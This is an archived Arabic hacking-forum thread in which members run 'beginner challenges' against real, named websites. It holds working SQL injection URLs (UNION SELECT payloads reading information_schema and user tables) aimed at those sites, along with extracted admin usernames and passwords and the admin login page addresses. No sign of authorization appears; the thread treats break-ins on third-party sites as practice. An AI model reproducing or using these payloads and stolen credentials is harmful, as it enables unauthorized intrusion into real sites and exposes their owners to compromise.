:: vBspiders Professional Network :: - تحديات خاصة بالمبتدئين في دورة sql

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)

- - تحديات خاصة بالمبتدئين في دورة sql (http://www.vbspiders.com/vb/t31386.html)

تحديات خاصة بالمبتدئين في دورة sql

السلام عليكم
لتدليل المصاعب امام المبتدئين , وتثمينا لمجهودات اخينا فولكانو , سأضع كل مرة موقعا مصابا ويحاول المبتدئون ايجاد معلوماته.
الأجوبة ترسل على الخاص وسيم وضع لائحة باسماء المتفوقين .
على بركة الله نبدأ

الموقع الأول
http://www.5landswalk.com.au

مدة التحدي يومان

لكم تحياتي

والله مبادرة رائعة جدا منك يا مارك

اقتباس:

المشاركة الأصلية كتبت بواسطة I PROMISE HACKER (المشاركة 159863)

والله مبادرة رائعة جدا منك يا مارك

احاول قدر المستطاع رد الجميل لهذا المنتدى العزيز
لك تحياتي

tnaks man , for this chalange

لم أتوصل بأي جواب لكن الاخوة ما شاء الله عليهم دخلوا الموقع وتم ترقيع الخطأ sql .

التحدي الثاني سهل
http://www.hironakajima.com/
نقطة البداية
http://www.hironakajima.com/business...php?mail_id=12

الثغرة sql
الاصدار 5

المدة يومان
لكم تحياتي

البيانات اممم
اليوزر stoneusa7
البااس stoned
اماا لووحة ماطلعت معااي هع هع ننتظر الباقين

اقتباس:

المشاركة الأصلية كتبت بواسطة coool (المشاركة 161608)

البيانات اممم
اليوزر stoneusa7
البااس stoned
اماا لووحة ماطلعت معااي هع هع ننتظر الباقين

مبروك عليك اخي الكريم واليك لوحة الدخول
http://www.hironakajima.com/admin/login.php

سأرفع موقعا آخر غدا بحول الله
لك تحياتي

السلام عليكم و رحمة الله تعالى و بركاته

شكرا أخي الغالي على الفكرة الجميلة كنت محتاج لها و الله

كود:

II- http://www.hironakajima.com/business/mail _old.php?mail_id=-12%20union% 20select%201,2,concat% 28table_name,0x3a,column_name,0x3a,tabl e_schema% 29,4,5+from+information_schema.columns+ where+column_name+LIKE+CHAR% 2837,%20112,%2097,%20115,%2037%29-- III- http://www.hironakajima.com/business/mail _old.php?mail_id=-12%20union% 20select%201,2,concat% 28table_name,0x3a,column_name,0x3a,tabl e_schema% 29,4,5+from+information_schema.columns+ where+table_name=0x75736572-- IV- http://www.hironakajima.com/business/mail _old.php?mail_id=-12 union select 1,2,concat (user_id,0x3a,userpass),4,5+from+user--

النتيجة

اليوزرنام 1
الباس stoned

************
user اسم جدول اليوزر
userpass اسم عمود لاباس
user_id اسم عمود اليوزر
اليوزرنام 1
الباس stoned
*************
يعني اليوزر مستحيل و الباس صحيح

جربت امر غروب و ليميت ما يشتغل معاي يعني قلت ربما اخطأت في الجدول لانه كما لاحضتم الجدول عندي اسمه user

تلميذ كسول خخخ

آسف اتمنى اشوف ردودكم اخوتي الكرام

سلام

هذا موقع ىخر جربت عليه و نفس المشكلة

كود:

http://accesscourses.net/fr/news_detail.php?id=-1 union select 1,2,3,concat(id,0x3a,pass),5,6+from+client--

1:1609

احاول استخدم أمر غروب ما ينفع يعني يعطيني نفس الجدول الي انا عملت عليه و ما يعطيني جداول أخرى اجرب عليها

اقتباس:

المشاركة الأصلية كتبت بواسطة lifenote (المشاركة 161859)

اتمنى على الأخ coool ان يشرح لنا طريقته لأنها صحيحة
بتظافر الجهود نتعلم جميعا ونرقى بمستوى المنتدى .

بالنسبة للموقع الثاني اخي lifenote
اليك المبتغى

اقتباس:

http://accesscourses.net/fr/news_det...rom%20client--

وجب اسعمال login بدل id
لك تحياتي

السلام عليكم
الموقع التالي
http://www.annapolisroyalwellnesscenterandspa.com
الثغرة sql
الاصدار 5
عدد الأعمدة 5 والمصاب رقم 2

لكم تحياتي

الموقع ما يضهر لي عليه خطا أخي

^_^

/////////

انضر اخي هنا

كود:

http://accesscourses.net/fr/news_detail.php?id=-1%20union%20select%201,concat%28login,0x3a,pass%29,3,4,5,6+from+client--

هل لي برابط لوحة التحكم ؟؟ او طريقة لتخمينها تكون سهلة لاني اضمن لك انه اليدوي ما ينفع
و حتى برنامج AdminPage

اقتباس:

المشاركة الأصلية كتبت بواسطة marrak (المشاركة 161909)

تسلم يا بطل
انتظرنى راح اجيب راسه n028

BL4CK TIG3R

جوابك صحيح اخي الكريم the cold zero.
وفقك الله لما يحب ويرضى
الجواب
admin:admin

لوحة التحكم
http://www.annapolisroyalwellnesscen...dmin/login.php

لكم تحياتي